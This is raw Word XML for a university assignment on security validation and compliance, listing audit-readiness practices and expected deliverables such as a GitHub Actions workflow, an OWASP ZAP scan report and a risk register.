      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A1A2E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Audit Readiness Best Practices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECFD0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Version Control: All documents committed to Git with meaningful commit messages referencing ticket IDs (e.g., fix(R-001): parameterize payment API queries).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECFD1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Branch Protection: main branch requires PR reviews and passing CI before merge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECFD2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Access Control: Rep</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t>ository uses team-based permissions; auditors granted read-only access via GitHub collaborator role.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECFD3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Automated Evidence Collection: GitHub Actions artifact uploads ensure evidence is captured without manual intervention.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECFD4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Quarterly Snapshots: Audit packages</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="222222"/>
        </w:rPr>
        <w:t xml:space="preserve"> created at end of each quarter via GitHub Releases with signed tags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECFD5" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338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Tamper Evidence: SHA-256 hashes of critical artifacts stored in artifact-hashes.csv and verified in CI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BAECFD6" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BAECFD7" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:sz="6" w:space="6" w:color="2E75B6"/>
          <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2E75B6"/>
        </w:pBdr>
        <w:spacing w:before="200" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F4E79"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Submission Summary — Expected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238"/>
        <w:gridCol w:w="2962"/>
      </w:tblGrid>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECF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FD8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FD9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FDA" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="002033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</w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECF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DC" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Section A (Q1)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DD" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Validation Criteria + Checklist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DE" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Excel / Docs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECF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E0" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Section B (Q2)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E1" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>GitHub Actions YAML Workflow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E2" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>github</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>/workflows/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>validation.yml</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECF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E4" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Section C (Q3)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E5" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>OWASP ZAP Scan Report + Severity Table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E6" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>HTML / Excel</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECF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E8" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Section C (Q3)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E9" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Evidence Screenshots / Scan Logs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EA" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>PNG / XML / Session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECF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EC" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Section D (Q4)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ED" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Validation Risk Register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EE" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Excel / Docs</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0052354F" w14:paraId="4BAECF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F0" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Section D (Q4)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F1" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>Compliance Evidence Repo (GitHub)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ECFF2" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:color w:val="222222"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t>GitHub Repository URL</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BAECFF4" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354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354F" w14:paraId="4BAEC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AECFF5" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
            <w:r>
              <w:rPr>
                <w:i/>
                <w:iCs/>
                <w:color w:val="1A3A5C"/>
              </w:rPr>
              <w:t>Submit GitHub repository link with all implementation evidence. Ensure repository is public or auditor access is granted before submission.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BAECFF7" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0052354F">
      <w:pPr>
        <w:spacing w:before="200"/>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0052354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ECFFE" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0020338F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4BAED000" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00203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AECFF9" w14:textId="76FF62A6" w:rsidR="0052354F" w:rsidRDefault="0020338F">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="single" w:sz="4" w:space="4" w:color="2E75B6"/>
      </w:pBdr>
      <w:spacing w:before="80"/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  |   Security Validation and Compliance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AECFFA" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="0020338F">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="4BAECFFC" w14:textId="77777777" w:rsidR="00000000" w:rsidRDefault="00203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AECFF8" w14:textId="77777777" w:rsidR="0052354F" w:rsidRDefault="0020338F">
    <w:pPr>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="6" w:space="4" w:color="2E75B6"/>
      </w:pBdr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:color w:val="2E75B6"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">Lahore Garrison </w:t>
    </w:r>
    <w:proofErr w:type="gramStart"/>
    <w:r>
      <w:rPr>
        <w:color w:val="2E75B6"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t>University  |</w:t>
    </w:r>
    <w:proofErr w:type="gramEnd"/>
    <w:r>
      <w:rPr>
        <w:color w:val="2E75B6"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">  Dept. of Computer Sciences</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:b/>
        <w:bCs/>
        <w:color w:val="C00000"/>
        <w:sz w:val="18"/>
        <w:szCs w:val="18"/>
      </w:rPr>
      <w:t xml:space="preserve">  |  SVV — SEE6603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A6526"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6AAA98A0"/>
    <w:lvl w:ilvl="0" w:tplc="C57A544A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="10EECF4A">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="FE8E1450">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="ACC81E98">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="3020A5B2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="○"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="41C21AB8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="■"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="44DE6BB2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="0CC67C3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="FA8090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E940CB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E070BFB8"/>
    <w:lvl w:ilvl="0" w:tplc="76F894A2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="AF107004">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="DD2A49F0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F4CCCB3C">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="6BE22BA6">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="E1DE7E70">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="1BBC42C2">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="988800D0">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="7CC2AAA4">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7ACE022A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="43AA2A88"/>
    <w:lvl w:ilvl="0" w:tplc="E6B687BA">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="58DA3802">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="◦"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1080" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="F5AA4212">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="2030566E">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="125CA590">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="37202B58">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="4C48F250">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="8EACE6A8">
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="764EF8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54F"/>
    <w:rsid w:val="0020338F"/>
    <w:rsid w:val="0052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ECE3D"/>
  <w15:docId w15:val="{AC3CE7FD-F680-4DA7-8A3F-A2FF7E1D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2372</Words>
  <Characters>13521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2026-05-18T10:17:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-18T10:17:00Z</dcterms:modified>
</cp:coreProperties>
</file>